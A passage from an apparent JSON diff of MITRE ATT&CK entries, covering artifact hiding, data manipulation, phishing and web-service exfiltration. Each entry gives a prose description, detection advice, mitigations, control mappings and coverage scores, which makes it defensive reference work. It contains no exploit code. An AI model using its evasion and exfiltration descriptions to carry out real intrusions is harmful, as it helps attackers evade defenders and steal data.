2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)", + "detection": "Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.", + "mitigations": [] + }, + { + "tid": "T1564.006", + "name": "Hide Artifacts: Run Virtual Instance", + "url": "https://attack.mitre.org/techniques/T1564/006", + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)\n\nAdversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)", + "detection": "Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances.\n\nConsider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. -silent, -ignore-reboot), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. VBoxManage startvm $VM --type headless).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. VBoxManage.exe setextradata global GUI/SuppressMessages \"all\").\n\nMonitor for commands which enable hypervisors such as Hyper-V. If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. \n\nBenign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1564.007", + "name": "Hide Artifacts: VBA Stomping", + "url": "https://attack.mitre.org/techniques/T1564/007", + "description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)\n\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)\n\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)", + "detection": "Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)\n\nIf the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1564.008", + "name": "Hide Artifacts: Email Hiding Rules", + "url": "https://attack.mitre.org/techniques/T1564/008", + "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)", + "detection": "Monitor email clients and applications for suspicious activity, such as missing messages or abnormal configuration and/or log entries.\n\nOn Windows systems, monitor for creation of suspicious inbox rules through the use of the New-InboxRule and Set-InboxRule PowerShell cmdlets.(Citation: Microsoft BEC Campaign) On MacOS systems, monitor for modifications to the RulesActiveState.plist, SyncedRules.plist, UnsyncedRules.plist, and MessageRules.plist files.(Citation: MacOS Email Rules)", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1564.009", + "name": "Hide Artifacts: Resource Forking", + "url": "https://attack.mitre.org/techniques/T1564/009", + "description": "Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)\n\nAdversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)", + "detection": "Identify files with the com.apple.ResourceFork extended attribute and large data amounts stored in resource forks. \n\nMonitor command-line activity leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections. ", + "mitigations": [ + { + "mid": "M1013", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "url": "https://attack.mitre.org/mitigations/M1013" + } + ] + } + ], + "mitigations": [], + "cumulative_score": 1.3868535016171428, + "adjusted_score": 1.3868535016171428, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1565", + "name": "Data Manipulation", + "description": "Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nThe type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "url": "https://attack.mitre.org/techniques/T1565", + "tactics": [ + "Impact" + ], + "detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "File: File Creation", + "File: File Deletion", + "File: File Metadata", + "File: File Modification", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Process: OS API Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1565.001", + "name": "Data Manipulation: Stored Data Manipulation", + "url": "https://attack.mitre.org/techniques/T1565/001", + "description": "Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1029", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "url": "https://attack.mitre.org/mitigations/M1029" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1565.002", + "name": "Data Manipulation: Transmitted Data Manipulation", + "url": "https://attack.mitre.org/techniques/T1565/002", + "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "detection": "Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. ", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ] + }, + { + "tid": "T1565.003", + "name": "Data Manipulation: Runtime Data Manipulation", + "url": "https://attack.mitre.org/techniques/T1565/003", + "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "detection": "Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.", + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1029", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "url": "https://attack.mitre.org/mitigations/M1029" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ], + "cumulative_score": 0.7638544095428572, + "adjusted_score": 0.7638544095428572, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [ + "3.11,3.12,3.3,4.4,6.1,6.2,6.8,11.1,11.2,11.3,11.4,11.5,12.2,12.8,16.8,3.10" + ], + "nist_controls": [ + "AC-16", + "AC-17", + "AC-18", + "AC-19", + "AC-20", + "AC-3", + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "CM-8", + "CP-10", + "CP-6", + "CP-7", + "CP-9", + "SC-28", + "SC-36", + "SC-4", + "SC-46", + "SC-7", + "SI-12", + "SI-16", + "SI-23", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1566", + "name": "Phishing", + "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source.", + "url": "https://attack.mitre.org/techniques/T1566", + "tactics": [ + "Initial Access" + ], + "detection": "Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nURL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nBecause most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.", + "platforms": [ + "Google Workspace", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "File: File Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1566.001", + "name": "Phishing: Spearphishing Attachment", + "url": "https://attack.mitre.org/techniques/T1566/001", + "description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. ", + "detection": "Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.\n\nMonitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL)", + "mitigations": [ + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1566.002", + "name": "Phishing: Spearphishing Link", + "url": "https://attack.mitre.org/techniques/T1566/002", + "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)", + "detection": "URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nBecause this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.", + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1566.003", + "name": "Phishing: Spearphishing via Service", + "url": "https://attack.mitre.org/techniques/T1566/003", + "description": "Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.", + "detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.", + "mitigations": [ + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "cumulative_score": 0.8240984071790476, + "adjusted_score": 0.8240984071790476, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.3,2.7,9.3,9.6,13.3,13.8,14.1,14.2,14.6" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "IA-9", + "SC-20", + "SC-44", + "SC-7", + "SI-2", + "SI-3", + "SI-4", + "SI-8" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1567", + "name": "Exfiltration Over Web Service", + "description": "Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.\n\nWeb service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.", + "url": "https://attack.mitre.org/techniques/T1567", + "tactics": [ + "Exfiltration" + ], + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Access", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1567.001", + "name": "Exfiltration Over Web Service: Exfiltration to Code Repository", + "url": "https://attack.mitre.org/techniques/T1567/001", + "description": "Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.\n\nExfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. ", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.", + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ] + }, + { + "tid": "T1567.002", + "name": "Exfiltration Over Web Service: Exfiltration to Cloud Storage", + "url": "https://attack.mitre.org/techniques/T1567/002", + "description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\n\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.", + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ], + "cumulative_score": 0.4857904761904763, + "adjusted_score": 0.4857904761904763, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "2.3,2.5,9.3" + ], + "nist_controls": [ + "AC-16", + "AC-2", + "AC-20", + "AC-23", + "AC-3", + "AC-4", + "AC-6", + "CA-3", + "CA-7", + "SA-8", + "SA-9", + "SC-28", + "SC-31", + "SC-7", + "SI-3", + "SI-4", + "SR-4" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1568", + "name": "Dynamic Resolution", + "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", + "url": "https://attack.mitre.org/techniques/T1568", + "tactics": [ + "Command And Control" + ], + "detection": "Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. In addition to 